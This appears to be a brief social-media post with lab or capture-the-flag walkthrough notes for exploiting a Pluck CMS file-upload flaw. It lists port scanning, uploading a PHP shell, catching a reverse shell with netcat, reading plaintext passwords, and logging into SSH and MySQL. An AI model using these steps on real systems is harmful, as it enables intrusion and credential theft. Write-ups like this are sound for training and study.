###CVE-2020-29607 Detail###

###File Upload Remote Code Execution (Authenticated)### 1. nmap -sC -sV -p- 10.113.146.0 -Pn -v 2. feroxbuster -u http://10.113.146.0/ --insecure --scan-dir-listings ##http://10.113.146.0/app/pluck-4.7.13/## 3. ##upload shell.phar 4. nc -lvnp 1234 5. python3 -c 'import pty; pty.spawn("/bin/bash")' 6. # Ctrl+Z в терминале stty raw -echo; fg xport TERM=xterm 7. cat /opt/test.py password = "HeyLucien#@1999!" 8. ssh lucien@10.113.146.0 9. cat .bash_history 10. mysql -u lucien -plucien42DBPASSWORD 11. show databases ........... ##There will be a sequel##

###CVE-2020-29607 Detail### | Сетка — социальная сеть от hh.ru